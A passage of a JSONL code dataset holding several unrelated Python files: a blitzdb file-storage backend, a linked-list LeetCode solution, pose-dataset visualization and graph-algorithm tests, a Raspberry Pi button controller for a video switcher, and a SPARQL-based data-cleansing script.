False\n self.begin()\n\n def load_config(self):\n config_file = self._path+\"/config.json\"\n if os.path.exists(config_file):\n with open(config_file,\"rb\") as config_file:\n self._config = Serializer.deserialize(config_file.read())\n else:\n self._config = {\n 'indexes' : {}\n }\n self.save_config()\n\n def save_config(self):\n config_file = self._path+\"/config.json\"\n with open(config_file,\"wb\") as config_file:\n config_file.write(Serializer.serialize(self._config))\n \n @property\n def path(self):\n return self._path\n\n def get_collection_store(self,collection):\n if not collection in self.stores:\n self.stores[collection] = self.CollectionStore({'path':self.path+\"/\"+collection+\"/objects\"})\n return self.stores[collection]\n\n def get_index_store(self,collection,store_key):\n if not store_key in self.index_stores[collection]:\n self.index_stores[collection][store_key] = self.IndexStore({'path':self.path+\"/\"+collection+\"/indexes/\"+store_key})\n return self.index_stores[collection][store_key]\n\n def register(self,cls,parameters = None):\n super(Backend,self).register(cls,parameters)\n self.init_indexes(self.get_collection_for_cls(cls))\n\n def begin(self):\n \"\"\"\n Starts a new transaction\n \"\"\"\n if self.in_transaction:#we're already in a transaction...\n self.commit()\n self.in_transaction = True\n for collection,store in self.stores.items():\n store.begin()\n indexes = self.indexes[collection]\n for index in indexes.values():\n index.begin()\n\n def rollback(self):\n \"\"\"\n Rolls back a transaction\n \"\"\"\n if not self.in_transaction:\n raise NotInTransaction\n for collection,store in self.stores.items():\n store.rollback()\n indexes = self.indexes[collection]\n for index in indexes.values():\n index.rollback()\n self.in_transaction = False\n\n def commit(self):\n \"\"\"\n Commits a transaction\n \"\"\"\n for collection in self.collections:\n store = self.get_collection_store(collection)\n store.commit()\n indexes = self.get_collection_indexes(collection)\n for index in indexes.values():\n index.commit()\n self.in_transaction = False\n self.begin()\n\n def init_indexes(self,collection):\n if collection in self._config['indexes']:\n #If not pk index is present, we create one on the fly...\n if not [idx for idx in self._config['indexes'][collection].values() if idx['key'] == self.primary_key_name]:\n self.create_index(collection,{'key':self.primary_key_name})\n \n #We sort the indexes such that pk is always created first...\n for index_params in sorted(self._config['indexes'][collection].values(),key = lambda x: 0 if x['key'] == self.primary_key_name else 1):\n index = self.create_index(collection,index_params)\n else:\n #If no indexes are given, we just create a primary key index...\n self.create_index(collection,{'key':self.primary_key_name})\n\n \n def rebuild_index(self,collection,key):\n index = self.indexes[collection][key]\n all_objects = self.filter(collection,{})\n for obj in all_objects:\n serialized_attributes = self.serialize(obj.attributes)#optimize this!\n index.add_key(serialized_attributes,obj._store_key)\n if self.autocommit:\n self.commit()\n\n def create_index(self,cls_or_collection,params):\n if not isinstance(params,dict):\n params = {'key' : params}\n if not isinstance(cls_or_collection,str) and not isinstance(cls_or_collection,unicode):\n collection = self.get_collection_for_cls(cls_or_collection)\n else:\n collection = cls_or_collection\n if params['key'] in self.indexes[collection]:\n return #Index already exists\n if not 'id' in params:\n 
params['id'] = uuid.uuid4().hex \n\n index_store = self.get_index_store(collection,params['id'])\n index = self.Index(params,index_store)\n self.indexes[collection][params['key']] = index\n\n if not collection in self._config['indexes']:\n self._config['indexes'][collection] = {}\n\n self._config['indexes'][collection][params['key']] = params\n self.save_config()\n\n if not index.loaded:#If the index failed to load, we rebuild it...\n self.rebuild_index(collection,index.key)\n\n return index\n\n def get_collection_indexes(self,collection):\n return self.indexes[collection] if collection in self.indexes else {}\n\n def encode_attributes(self,attributes):\n return Serializer.serialize(attributes)\n\n def decode_attributes(self,data):\n return Serializer.deserialize(data)\n\n def get_object(self,cls,key):\n collection = self.get_collection_for_cls(cls)\n store = self.get_collection_store(collection)\n try:\n data = self.deserialize(self.decode_attributes(store.get_blob(key)))\n except IOError:\n raise cls.DoesNotExist\n obj = self.create_instance(cls,data)\n return obj\n\n def save(self,obj):\n collection = self.get_collection_for_obj(obj)\n indexes = self.get_collection_indexes(collection)\n store = self.get_collection_store(collection)\n\n if obj.pk == None:\n obj.pk = uuid.uuid4().hex \n\n serialized_attributes = self.serialize(obj.attributes)\n data = self.encode_attributes(serialized_attributes)\n \n try:\n store_key = self.get_pk_index(collection).get_keys_for(obj.pk).pop()\n except IndexError:\n store_key = uuid.uuid4().hex\n \n store.store_blob(data,store_key)\n\n for key,index in indexes.items():\n index.add_key(serialized_attributes,store_key)\n\n if self.autocommit:\n self.commit()\n\n return obj\n\n def get_pk_index(self,collection):\n return self.indexes[collection][self.primary_key_name]\n\n def delete(self,obj):\n \n collection = self.get_collection_for_obj(obj)\n store = self.get_collection_store(collection)\n indexes = self.get_collection_indexes(collection)\n \n store_keys = self.get_pk_index(collection).get_keys_for(obj.pk)\n \n for store_key in store_keys:\n try:\n store.delete_blob(store_key)\n except IOError:\n pass\n for index in indexes.values():\n index.remove_key(store_key)\n\n if self.autocommit:\n self.commit()\n\n def get(self,cls,query):\n objects = self.filter(cls,query,limit = 1)\n if len(objects) == 0:\n raise cls.DoesNotExist\n elif len(objects) > 1:\n return cls.MultipleDocumentsReturned\n return objects[0]\n\n def compile_query(self,query_dict):\n\n def access_path(d,path):\n v = d\n for elem in path:\n if isinstance(v,list):\n v = v[int(elem)]\n else:\n v = v[elem]\n return v\n\n serialized_query_dict = self.serialize(query_dict)\n\n compiled_query = []\n for key,value in serialized_query_dict.items():\n splitted_key = key.split(\".\")\n accessor = lambda d,path = splitted_key : access_path(d,path = path)\n compiled_query.append((key,accessor,value))\n return compiled_query\n \n def filter(self,cls_or_collection,query,sort_by = None,limit = None,offset = None,initial_keys = None):\n\n if not isinstance(query,dict):\n raise AttributeError(\"Query parameters must be dict!\")\n\n if not isinstance(cls_or_collection,str) and not isinstance(cls_or_collection,unicode):\n collection = self.get_collection_for_cls(cls_or_collection)\n cls = cls_or_collection\n else:\n collection = cls_or_collection\n cls = self.get_cls_for_collection(collection)\n\n store = self.get_collection_store(collection)\n indexes = self.get_collection_indexes(collection)\n compiled_query = 
self.compile_query(query)\n\n unindexed_queries = []\n indexed_queries = []\n\n indexes_by_key = dict([(idx.key,idx) for idx in indexes.values()])\n\n for key,accessor,value in compiled_query:\n if key in indexes_by_key:\n indexed_queries.append([indexes_by_key[key],value])\n else:\n unindexed_queries.append([accessor,value])\n\n if indexed_queries:\n keys = None\n if initial_keys:\n keys = copy.copy(initial_keys)\n for index,value in indexed_queries:\n if not keys:\n keys = index.get_keys_for(value)\n else:\n keys = [key for key in keys if key in index.get_keys_for(value)]\n elif initial_keys:\n keys = copy.copy(initial_keys)\n else:\n #We fetch ALL keys from the primary index.\n keys = self.get_pk_index(collection).get_all_keys()\n\n for accessor,value in unindexed_queries:\n keys_to_remove = []\n for key in keys:\n try:\n attributes = self.decode_attributes(store.get_blob(key))\n except IOError:\n raise DatabaseIndexError\n try:\n if callable(value):\n if not value(accessor(attributes)):\n if not key in keys_to_remove:\n keys_to_remove.append(key)\n else:\n accessed_value = accessor(attributes)\n if isinstance(accessed_value,list):\n if value not in accessed_value: \n if not key in keys_to_remove:\n keys_to_remove.append(key)\n elif accessed_value != value:\n if not key in keys_to_remove:\n keys_to_remove.append(key) \n except (KeyError,IndexError):\n if not key in keys_to_remove:\n keys_to_remove.append(key)\n keys = [key for key in keys if not key in keys_to_remove]\n\n return QuerySet(self,cls,store,keys)\n\n","sub_path":"blitzdb/backends/file/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"172736854","text":"# coding: utf-8\n__author__ = \"shiyue\"\n\"\"\"\nGiven a linked list, remove the nth node from the end of list and return its head.\n\nFor example,\n\n Given linked list: 1->2->3->4->5, and n = 2.\n\n After removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\nGiven n will always be valid.\nTry to do this in one pass.\n\nSubscribe to see which companies asked this question\n\"\"\"\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n if not head: return head\n p, q, pre = head, head, -1\n for i in range(n):\n p = p.next\n while p:\n p = p.next\n pre = q\n q = q.next\n if pre != -1:\n pre.next = pre.next.next\n else:\n head = head.next\n return head\n","sub_path":"easy/Remove Nth Node From End of List.py","file_name":"Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"377757615","text":"import torch\nfrom torch.utils.data import DataLoader\n\nfrom human36m import HM36Dataset\n\nfrom DGPT.Utils.CUDAFuncs.GaussianBlur import GaussianBlur_CUDA\n\nimport time\nimport numpy as np\nimport cv2\n\ndef CamProj(x, y, z, fx, fy, u, v, k=1.0):\n cam_x = x / z * fx\n cam_x = cam_x / k + u\n cam_y = y / z * fy\n cam_y = cam_y / k + v\n return cam_x, cam_y\n\nBODY_CONN_COLOR = (\n # pelvis r_hip r_knee r_ank L_hip L_knee L_ank Spine\n [0, 255, 0], [255, 0, 255], [0, 0, 255], [0, 255, 255], [255, 255, 255], [0, 128, 255], [204, 204, 255], [255, 102, 255],\n # neck Head Site L_shoulder 
L_elbow L_wrist R_shoulder R_elbow\n [255, 0, 0], [0, 255, 0], [255, 255, 255], [255, 0, 0], [0, 255, 0], [255, 255, 255], [255, 0, 0], [0, 255, 0],\n # R_wrist\n [255, 255, 255]\n)\n\nBODY_PARTS_KPT_IDS = [[8, 1],\n [1, 2],\n [2, 3],\n [8, 4],\n [4, 5],\n [5, 6],\n [8, 14],\n [14, 15],\n [15, 16],\n [8, 11],\n [11, 12],\n [12, 13],\n [8, 9],\n [9, 10],\n [8, 7],\n [7, 0],\n ]\nBODY_PARTS_PAF_IDS = ([0, 1], [2, 3], [4, 5],\n [6, 7], [8, 9], [10, 11], [12, 13], [14, 15], [16, 17], [18, 19],\n [20, 21], [22, 23], [24, 25], [26, 27], [28, 29], [30, 31])\n\nif __name__ == '__main__':\n st = time.time()\n\n batch = 1\n dataset = HM36Dataset(\"d:/datasets/human3.6m\", 8, 7, 1, [1], paf_ver=2)\n train_loader = DataLoader(dataset, batch_size=batch, shuffle=True, num_workers=1)\n\n print(\"load data cost \", time.time() - st)\n\n blur = GaussianBlur_CUDA(0.9)\n\n for batch_data in train_loader:\n # print(batch_data)\n\n for i in range(batch):\n rot = batch_data['R'][i]\n trans = batch_data['T'][i]\n center = batch_data['C'][i]\n focal = batch_data['F'][i]\n scale = batch_data['scale'][i]\n\n center = center * scale\n focal *= scale\n\n # print(rot.shape, trans.shape, len(batch_data['joints']))\n img = batch_data['tensor'][i].cuda().unsqueeze(0)\n img = blur(img)\n img = img.cpu().squeeze(0).permute(1, 2, 0).numpy()\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n\n # img1 = batch_data['tensor1'][i].permute(1, 2, 0).numpy()\n # img1 = cv2.cvtColor(img1, cv2.COLOR_RGB2BGR)\n\n heatmap = batch_data['heatmap'][i].permute(1, 2, 0).numpy()\n # heatmap = heatmap[:, :, :255].sum(2)\n heatmap = heatmap[:, :, 255:]#.sum(2)\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_GRAY2BGR)\n heatmap = cv2.resize(heatmap, (512, 512))\n\n paf_map = batch_data['paf'][i].permute(1, 2, 0).numpy()\n paf_map = paf_map.sum(2)\n # print(paf_map.shape)\n paf_map = cv2.cvtColor(paf_map, cv2.COLOR_GRAY2BGR)\n paf_map = cv2.resize(paf_map, (512, 512))\n\n # for xyz in batch_data['joints'][i]:\n # # print(xyz.shape, xyz, batch_data['joints'][i])\n # # print(xyz.shape, \" - \", trans.shape)\n # # print(xyz.shape, rot.shape)\n # xyz = torch.mm(rot, (xyz - trans).unsqueeze(0).transpose(1, 0)).reshape(3)\n #\n # x, y = CamProj(xyz[0], xyz[1], xyz[2], focal[0], focal[1], center[0], center[1])\n # # print(x, y)\n # cv2.circle(img, (int(x.item()), int(y.item())), 5, [0, 0, 255], -1)\n\n left = [4, 5, 6, 11, 12, 13]\n for j in range(len(batch_data['joints_2d'][i])):\n xyz = batch_data['joints_2d'][i][j]\n color = BODY_CONN_COLOR[j]\n # color = [0, 255, 255] if j in left else [0, 255, 0]\n sz = 5 if j in left else 3\n cv2.circle(img, (int(xyz[0].item()), int(xyz[1].item())), sz, color, -1)\n\n cv2.imshow(\"test\", img)\n cv2.imshow(\"heatmap\", heatmap)\n cv2.imshow(\"paf\", paf_map)\n\n # print(type(batch_data['extra'][i]), batch_data['extra'][i].shape)\n for j in range(2):\n # for j in range(len(batch_data['extra'][i])):\n t = batch_data['extra'][i][j * 3:(j+1)*3, ...]\n e = t.permute(1, 2, 0).numpy()\n ie = cv2.cvtColor(e, cv2.COLOR_RGB2BGR)\n cv2.imshow(f\"extra_{j}\", ie)\n\n pafs = batch_data['paf'][i].permute(1, 2, 0).numpy()\n\n scale = 4\n img_p = np.zeros((pafs.shape[1] * 8, pafs.shape[0] * 8, 3), dtype=np.uint8)\n # pafs[pafs < 0.07] = 0\n for idx in range(len(BODY_PARTS_PAF_IDS)):\n # print(pp, pafs.shape)\n pp = BODY_PARTS_PAF_IDS[idx]\n k_idx = BODY_PARTS_KPT_IDS[idx]\n cc = BODY_CONN_COLOR[idx]\n\n vx = pafs[:, :, pp[0]]\n vy = pafs[:, :, pp[1]]\n for i in range(pafs.shape[1]):\n for j in range(pafs.shape[0]):\n a = (i * 2 * scale, 
j * 2 * scale)\n b = (2 * int((i + vx[j, i] * 3) * scale), 2 * int((j + vy[j, i] * 3) * scale))\n if a[0] == b[0] and a[1] == b[1]:\n continue\n\n cv2.line(img_p, a, b, cc, 1)\n\n # break\n\n cv2.imshow(\"paf\", img_p)\n\n key = cv2.waitKey(0)\n if key == 27: # esc\n exit(0)\n","sub_path":"datasets/h36m_test.py","file_name":"h36m_test.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"622944691","text":"\"\"\"\nModule with tests for shortest-paths graphs problems.\n\"\"\"\nimport unittest\n\nfrom pystrukts.graphs import Graph\nfrom pystrukts.graphs.common import Vertex\nfrom pystrukts.graphs.shortest_paths import bellman_ford\n\n\nclass TestSuiteShortestPathsGraphs(unittest.TestCase):\n \"\"\"\n Test suite for shortest-paths graphs problems.\n \"\"\"\n\n def test_should_run_bellman_ford_without_negative_weight_cycles(self):\n \"\"\"\n Should run Bellman-Ford without negative weight cycles (algorithm should return True).\n \"\"\"\n # arrange\n g: Graph[str] = self.build_weighted_and_directed_graph_1()\n s: Vertex[str] = g.get_vertex(\"s\")\n\n # act\n has_no_negative_weight_cycle = bellman_ford(g, s)\n\n # assert\n self.assertTrue(has_no_negative_weight_cycle)\n self.assertEqual(g.get_vertex(\"s\").distance, 0)\n self.assertEqual(g.get_vertex(\"t\").distance, 3)\n self.assertEqual(g.get_vertex(\"x\").distance, 9)\n self.assertEqual(g.get_vertex(\"y\").distance, 5)\n self.assertEqual(g.get_vertex(\"z\").distance, 11)\n\n def test_should_run_bellman_ford_with_negative_weight_cycles(self):\n \"\"\"\n Should run Bellman-Ford without negative weight cycles (algorithm should return False).\n \"\"\"\n # arrange\n g: Graph[str] = self.build_negative_weight_cycle_graph()\n s: Vertex[str] = g.get_vertex(\"s\")\n\n # act\n has_no_negative_weight_cycle = bellman_ford(g, s)\n\n # assert\n self.assertFalse(has_no_negative_weight_cycle)\n\n def build_weighted_and_directed_graph_1(self) -> Graph[str]:\n g: Graph[str] = Graph(directed=True, weighted=True)\n\n s = g.add_vertex(\"s\")\n t = g.add_vertex(\"t\")\n x = g.add_vertex(\"x\")\n y = g.add_vertex(\"y\")\n z = g.add_vertex(\"z\")\n\n g.add_edge(s, t, 3)\n g.add_edge(t, x, 6)\n g.add_edge(t, y, 2)\n g.add_edge(y, t, 1)\n g.add_edge(s, y, 5)\n g.add_edge(x, z, 2)\n g.add_edge(z, x, 7)\n g.add_edge(y, z, 6)\n g.add_edge(y, x, 4)\n g.add_edge(z, s, 3)\n\n return g\n\n def build_negative_weight_cycle_graph(self) -> Graph[str]:\n g: Graph[str] = Graph(directed=True, weighted=True)\n\n s = g.add_vertex(\"s\")\n t = g.add_vertex(\"t\")\n x = g.add_vertex(\"x\")\n y = g.add_vertex(\"y\")\n z = g.add_vertex(\"z\")\n\n g.add_edge(s, t, 3)\n g.add_edge(t, x, 6)\n g.add_edge(t, y, 2)\n g.add_edge(y, t, 1)\n g.add_edge(s, y, 5)\n g.add_edge(y, z, 6)\n g.add_edge(y, x, 4)\n g.add_edge(z, s, 3)\n\n # negative weight cycle\n g.add_edge(x, z, 2)\n g.add_edge(z, x, -7)\n\n return g\n","sub_path":"tests/graphs/shortest_paths/test_bellman_ford.py","file_name":"test_bellman_ford.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"189245439","text":"#Test cells/subset\nimport numpy as np\nimport sys\nsys.path.append(r'C:\\Users\\tghad\\Documents\\GitHub\\TarekGhaddarGraduateWork\\sweep_optimizer\\3d')\nfrom mesh_processor import get_cells_per_subset_3d_numerical,create_3d_cuts,get_cells_per_subset_3d_numerical_test2,create_2d_cuts\nfrom mesh_processor import 
get_cells_per_subset_2d_test, get_cells_per_subset_2d_numerical\nimport build_3d_adjacency as b3a\nfrom build_global_subset_boundaries import build_global_subset_boundaries\nfrom build_adjacency_matrix import build_adjacency\nimport time\n\n\n#xmin = 0.0\n#xmax = 60.96\n#ymin = 0.0\n#ymax = xmax\n#zmin = xmin\n#zmax = 146.05\nxmin = 0.0\nxmax = 1.0\nymin = 0.0\nymax = 1.0\nzmin = 0.0\nzmax = 1.0 # zmin/zmax were left undefined when the values above were commented out; unit-cube bounds assumed here to match x/y\n\n\nz_cuts,x_cuts,y_cuts = create_3d_cuts(xmin,xmax,5,ymin,ymax,5,zmin,zmax,5)\nboundaries = b3a.build_3d_global_subset_boundaries(4,4,4,x_cuts,y_cuts,z_cuts)\n\nx_cuts,y_cuts = create_2d_cuts(xmin,xmax,2,ymin,ymax,2)\nboundaries = build_global_subset_boundaries(1,1,x_cuts,y_cuts)\nadjacency_matrix = build_adjacency(boundaries,1,1,y_cuts)\n\npoints = np.genfromtxt(\"../unbalanced_pins_centroid_data\").T\n\n#start = time.time()\n#cells_per_subset,bdy_cells_per_subset = get_cells_per_subset_3d_numerical(points,boundaries)\n#end = time.time()\n#print(end-start)\n\n#start = time.time()\n#cells_per_subset_test,bdy_cells_per_subset_test = get_cells_per_subset_3d_numerical_test2(points,boundaries)\n#end = time.time()\n#print(end-start)\n\nstart = time.time()\ncells_per_subset,bdy_cells_per_sub = get_cells_per_subset_2d_test(points,boundaries,adjacency_matrix,2,2)\nend = time.time()\n\nprint(end - start)\nstart = time.time()\ncells_per_subset_old,bdy_cells_per_sub_old = get_cells_per_subset_2d_numerical(points,boundaries,adjacency_matrix,2,2)\nend = time.time()\nprint(end-start)","sub_path":"Dissertation/python_scripts/im1_mesh/test_cells_per_subset_3d.py","file_name":"test_cells_per_subset_3d.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"413337325","text":"#!/usr/bin/python\nimport RPi.GPIO as GPIO\nimport socket\nimport sys\nimport time\n###################################################################\n# insert in '/etc/crontab'\n#@reboot root [/location/ofyourfile.py]\n#for autostart\n####################################################################\n#insert\n#\n#\n#establish GPIOS\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(21, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(20, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(26, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(16, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(19, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(13, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(12, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(6, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(5, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(7, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(8, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(11, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(25, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(9, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(10, GPIO.IN, pull_up_down = GPIO.PUD_UP)\nGPIO.setup(24, GPIO.IN, pull_up_down = GPIO.PUD_UP)\n\n# Establish TCP/IP sockets\n#vcs --> Switcher\nsockvcs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = ('192.168.1.60', 9990)\nsockvcs.connect(server_address)\ntime.sleep(0.4)\ndata = sockvcs.recv(8888)\n\n#Define switcher Output\n\n#Define each input\n#\n#\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" [input(logical)]\" + \"\\n\\n\")\noutput = 15\n#print('start')\nwhile True:\n\t#Button01\n\tif(GPIO.input(21) == 0):\n\t\t#print('Button 1 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 42\" + 
\"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button02\n\tif(GPIO.input(20) == 0):\n\t\t#print('Button 2 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 43\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button03\n\tif(GPIO.input(26) == 0):\n\t\t#print('Button 3 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 44\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button04\n\tif(GPIO.input(16) == 0):\n\t\t#print('Button 4 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 45\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button05\n\tif(GPIO.input(19) == 0):\n\t\t#print('Button 5 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 46\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button06\n\tif(GPIO.input(13) == 0):\n\t\t#print('Button 6 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 47\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button07\n\tif(GPIO.input(12) == 0):\n\t\t#print('Button 7 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button08\n\tif(GPIO.input(6) == 0):\n\t\t#print('Button 8 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button09\n\tif(GPIO.input(5) == 0):\n\t\t#print('Button 9 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button10\n\tif(GPIO.input(7) == 0):\n\t\t#print('Button 10 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button11\n\tif(GPIO.input(8) == 0):\n\t\t#print('Button 11 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button12\n\tif(GPIO.input(11) == 0):\n\t\t#print('Button 12 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button13\n\tif(GPIO.input(25) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button14\n\tif(GPIO.input(9) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\t\t\n\t#Button15\n\tif(GPIO.input(10) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t#Button16\n\tif(GPIO.input(24) == 0):\n\t\t#print('Button 13 pressed')\n\t\tsockvcs.send(\"VIDEO OUTPUT ROUTING:\\n\" + str(output) + \" 28\" + \"\\n\\n\")\n\t\ttime.sleep(0.1)\n\t\n\t\t\nGPIO.cleanup()\n","sub_path":"Videohubtools-master/butt16_1.py","file_name":"butt16_1.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340368059","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom datetime import datetime\nimport dateparser\nimport hashlib\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nfrom cleansing import central, contact, organization, worship\nfrom rdflib import Graph, Literal, URIRef\nfrom rdflib.namespace import SKOS, RDFS, XSD\nimport re\n\nSPARQL = SPARQLWrapper(\"https://centrale-vindplaats.lblod.info/sparql\")\n\ndef load_gp():\n return pd.read_excel('input/gemeente-provincie.xlsx', sheet_name='Feuil2')\n\nGP = load_gp()\n\ndef 
concept_uri(base_uri, input):\n m = hashlib.md5()\n m.update(input.encode('utf-8'))\n\n return (URIRef(base_uri + m.hexdigest()), m.hexdigest())\n\ndef add_literal(g, subject, predicate, object_value, datatype=None):\n if object_value != str(np.nan):\n if datatype == None:\n g.add((subject, predicate, Literal(object_value, lang='nl')))\n else:\n g.add((subject, predicate, Literal(object_value, datatype=datatype)))\n\ndef shuffle_word(word):\n return ''.join(random.sample(word.lower(), len(word))).title() \n \ndef status_mapping_central(status):\n status_dict = {'Operationeel': 'Actief', 'Niet actief - Samengevoegd n.a.v. een gemeentefusie': 'Niet Actief', \n 'Operationeel – nieuw CKB n.a.v. gemeentefusie': 'Actief', 'Niet actief - opgeheven': 'Niet Actief',\n 'Niet actief - Niet van toepassing': 'Niet Actief', 'Niet actief - ontbreekt': 'DELETE RECORD'}\n\n return status_dict[status]\n\ndef status_mapping_worship(status):\n status_dict = {'Erkenningsaanvraag in behandeling': 'DELETE RECORD', 'Operationeel': 'Actief', 'Niet actief - Samengevoegd (overgenomen)': 'Niet Actief',\n 'Operationeel - Samengevoegd (met behoud van naam)': 'Actief', 'Niet actief - Samengevoegd (nieuwe entiteit)': 'Niet Actief',\n 'Operationeel - Samengevoegd (met nieuwe naam)': 'Actief', 'Niet actief - Erkenning niet toegestaan': 'Niet Actief',\n 'Operationeel - Samenvoeging lopende':\t'Actief', 'Niet actief - Ingetrokken': 'Niet Actief', 'Operationeel - Intrekkingsaanvraag lopende':\t'Actief'}\n\n return status_dict[status]\n\ndef status_mapping_org(status):\n status_dict = {'Actief': 'Actief', 'Afgesloten (Vereffend)': 'Niet actief', 'Bijna Afgesloten (In ontbinding, ontbonden of in vereffening)': 'Niet actief',\n 'Formeel opgericht maar nog niet operationeel': 'Niet actief', 'gefusioneerd': 'Niet actief', 'In oprichting': 'Niet actief'}\n\n return status_dict[status]\n\ndef bestuursorgaan_mapping_central(type):\n bestuursorgaan_dict = {'Rooms-Katholiek': 'Centraal kerkbestuur', 'Orthodox': 'Centraal kerkbestuur', 'Islamitisch': 'Centraal bestuur'}\n\n return bestuursorgaan_dict[type]\n\ndef bestuursorgaan_mapping_worship(type):\n bestuursorgaan_dict = {'Rooms-Katholiek': 'Kerkraad', 'Rooms-Katholiek Kathedraal': 'Kathedrale kerkraad', 'Protestants': 'Bestuursraad', 'Orthodox': 'Kerkfabriekraad',\n 'Islamitisch': 'Comité', 'Israëlitisch': 'Bestuursraad', 'Anglicaans': 'Kerkraad', 'nan': 'nan'}\n\n return bestuursorgaan_dict[type]\n\ndef bestuurseenheid_mapping_org(type):\n bestuurseenheid_dict = {'AGB': 'Autonoom gemeentebedrijf', 'APB': 'Autonoom provinciebedrijf', 'HVZ': 'Hulpverleningszone', 'PZ': 'Politiezone', \n 'IGS_PV': 'Projectvereniging', 'IGS_DV': 'Dienstverlenende vereniging', 'IGS_OV': 'Opdrachthoudende vereniging'}\n\n return bestuurseenheid_dict[type]\n\ndef find_central_info(central_db, central_id):\n central_row = central_db[central_db['Titel'] == central_id][['KBO_CKB_cleansed','Naam_CKB']]\n\n return (str(central_row['KBO_CKB_cleansed'].values[0]), str(central_row['Naam_CKB'].values[0]))\n\ndef find_central_entity(central_graph, central_titel, central_kbo, central_name):\n concept = None\n\n query = \"\"\"\n SELECT ?central WHERE { ?central skos:prefLabel ?central_name; adms:identifier ?identifier_sp . \n ?identifier_sp generiek:gestructureerdeIdentificator ?titel_id .\n ?titel_id generiek:lokaleIdentificator ?central_titel .\n }\n \"\"\"\n\n # ?identifier_kbo generiek:gestructureerdeIdentificator ?kbo_id . 
